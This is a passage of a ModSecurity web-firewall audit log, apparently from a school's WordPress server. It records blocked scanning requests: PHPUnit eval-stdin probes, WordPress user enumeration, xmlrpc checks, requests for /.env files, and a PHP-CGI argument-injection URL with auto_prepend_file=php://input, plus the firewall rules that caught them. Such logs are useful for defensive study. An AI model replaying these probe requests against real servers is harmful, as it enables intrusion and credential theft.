403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7323881b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747416321663510 2811 (- - -) Stopwatch2: 1747416321663510 2811; combined=1474, p1=441, p2=983, p3=0, p4=0, p5=49, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7323881b-Z-- --a50bc73b-A-- [17/May/2025:00:40:22 +0700] aCd4hthEtho3ciA0wehcwAAAAIU 103.236.140.4 52274 103.236.140.4 8181 --a50bc73b-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 79.124.58.198 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 79.124.58.198 X-Forwarded-Proto: https Connection: close Content-Length: 19 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded --a50bc73b-C-- --a50bc73b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50bc73b-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --0d859661-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d859661-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747418124949232 6162 (- - -) Stopwatch2: 1747418124949232 6162; combined=4406, p1=619, p2=3544, p3=34, p4=36, p5=101, sr=80, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d859661-Z-- --461bfd19-A-- [17/May/2025:00:58:01 +0700] aCd8qce47ocjCGWTS4Y-nwAAAEg 103.236.140.4 52744 103.236.140.4 8181 --461bfd19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 199.68.177.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 199.68.177.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --461bfd19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461bfd19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747418281277161 2888 (- - -) Stopwatch2: 1747418281277161 2888; combined=1301, p1=435, p2=835, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461bfd19-Z-- --e73e4d10-A-- [17/May/2025:01:07:09 +0700] aCd-zde6THFz1hsaJaLY4QAAABc 103.236.140.4 53098 103.236.140.4 8181 --e73e4d10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.146.63.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.146.63.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e73e4d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e73e4d10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747418829564709 3101 (- - -) Stopwatch2: 1747418829564709 3101; combined=1330, p1=430, p2=870, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e73e4d10-Z-- --bed0d907-A-- [17/May/2025:01:30:01 +0700] aCeEKde6THFz1hsaJaLY7wAAAAM 103.236.140.4 53344 103.236.140.4 8181 --bed0d907-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.156.115.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.156.115.59 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --bed0d907-C-- --bed0d907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bed0d907-E-- --bed0d907-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747420201901230 3968 (- - -) Stopwatch2: 1747420201901230 3968; combined=2780, p1=366, p2=2392, p3=0, p4=0, p5=21, sr=51, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bed0d907-Z-- --acaf9c57-A-- [17/May/2025:01:32:35 +0700] aCeEw8e47ocjCGWTS4Y-wgAAAEY 103.236.140.4 53432 103.236.140.4 8181 --acaf9c57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --acaf9c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acaf9c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747420355470112 14900 (- - -) Stopwatch2: 1747420355470112 14900; combined=25652, p1=411, p2=717, p3=0, p4=0, p5=12276, sr=72, sw=1, l=0, gc=12247 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acaf9c57-Z-- --dadbe553-A-- [17/May/2025:01:32:42 +0700] aCeEyse47ocjCGWTS4Y-xAAAAEk 103.236.140.4 53436 103.236.140.4 8181 --dadbe553-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dadbe553-C-- demo.sayHello --dadbe553-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dadbe553-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747420362336490 6210 (- - -) Stopwatch2: 1747420362336490 6210; combined=4796, p1=543, p2=3661, p3=32, p4=35, p5=276, sr=77, sw=249, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dadbe553-Z-- --69ecb22a-A-- [17/May/2025:01:52:34 +0700] aCeJcthEtho3ciA0wehdKgAAAJg 103.236.140.4 53544 103.236.140.4 8181 --69ecb22a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.196.223.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.196.223.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69ecb22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69ecb22a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747421554643885 2656 (- - -) Stopwatch2: 1747421554643885 2656; combined=1241, p1=417, p2=796, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69ecb22a-Z-- --f743675d-A-- [17/May/2025:02:01:07 +0700] aCeLc9hEtho3ciA0wehdNQAAAIw 103.236.140.4 53576 103.236.140.4 8181 --f743675d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f743675d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f743675d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747422067001192 3381 (- - -) Stopwatch2: 1747422067001192 3381; combined=1497, p1=482, p2=919, p3=0, p4=0, p5=95, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f743675d-Z-- --df2f0518-A-- [17/May/2025:02:01:14 +0700] aCeLethEtho3ciA0wehdOAAAAJQ 103.236.140.4 53582 103.236.140.4 8181 --df2f0518-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df2f0518-C-- demo.sayHello --df2f0518-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2f0518-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422074408098 5940 (- - -) Stopwatch2: 1747422074408098 5940; combined=4353, p1=655, p2=3528, p3=21, p4=23, p5=73, sr=158, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2f0518-Z-- --4015c03d-A-- [17/May/2025:02:01:56 +0700] aCeLpMe47ocjCGWTS4Y-2AAAAFY 103.236.140.4 53592 103.236.140.4 8181 --4015c03d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4015c03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4015c03d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747422116875338 830 (- - -) Stopwatch2: 1747422116875338 830; combined=322, p1=276, p2=0, p3=0, p4=0, p5=46, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4015c03d-Z-- --d98aec12-A-- [17/May/2025:02:01:57 +0700] aCeLpdhEtho3ciA0wehdPAAAAIA 103.236.140.4 53596 103.236.140.4 8181 --d98aec12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d98aec12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d98aec12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747422117434593 871 (- - -) Stopwatch2: 1747422117434593 871; combined=347, p1=301, p2=0, p3=0, p4=0, p5=46, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d98aec12-Z-- --5741c62f-A-- [17/May/2025:02:02:19 +0700] aCeLu9hEtho3ciA0wehdPwAAAIk 103.236.140.4 53610 103.236.140.4 8181 --5741c62f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5741c62f-C-- demo.sayHello --5741c62f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5741c62f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422139344436 5647 (- - -) Stopwatch2: 1747422139344436 5647; combined=4140, p1=631, p2=3355, p3=21, p4=23, p5=64, sr=171, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5741c62f-Z-- --360e891c-A-- [17/May/2025:02:04:00 +0700] aCeMIMe47ocjCGWTS4Y-2wAAAEI 103.236.140.4 53630 103.236.140.4 8181 --360e891c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --360e891c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --360e891c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747422240394649 2985 (- - -) Stopwatch2: 1747422240394649 2985; combined=1299, p1=425, p2=839, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --360e891c-Z-- --1bed7a20-A-- [17/May/2025:02:04:05 +0700] aCeMJce47ocjCGWTS4Y-3AAAAEg 103.236.140.4 53640 103.236.140.4 8181 --1bed7a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bed7a20-C-- demo.sayHello --1bed7a20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bed7a20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422245804033 4827 (- - -) Stopwatch2: 1747422245804033 4827; combined=3735, p1=480, p2=3058, p3=23, p4=26, p5=87, sr=81, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bed7a20-Z-- --9949243f-A-- [17/May/2025:02:18:24 +0700] aCePgNe6THFz1hsaJaLZAgAAAA0 103.236.140.4 53718 103.236.140.4 8181 --9949243f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9949243f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9949243f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423104029172 2800 (- - -) Stopwatch2: 1747423104029172 2800; combined=1268, p1=427, p2=811, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9949243f-Z-- --bf30a464-A-- [17/May/2025:02:18:31 +0700] aCePh9e6THFz1hsaJaLZAwAAABU 103.236.140.4 53722 103.236.140.4 8181 --bf30a464-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bf30a464-C-- demo.sayHello --bf30a464-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf30a464-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423111237158 6287 (- - -) Stopwatch2: 1747423111237158 6287; combined=4493, p1=592, p2=3703, p3=33, p4=37, p5=76, sr=79, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf30a464-Z-- --fe650817-A-- [17/May/2025:02:20:04 +0700] aCeP5Ne6THFz1hsaJaLZBwAAABM 103.236.140.4 53732 103.236.140.4 8181 --fe650817-B-- GET 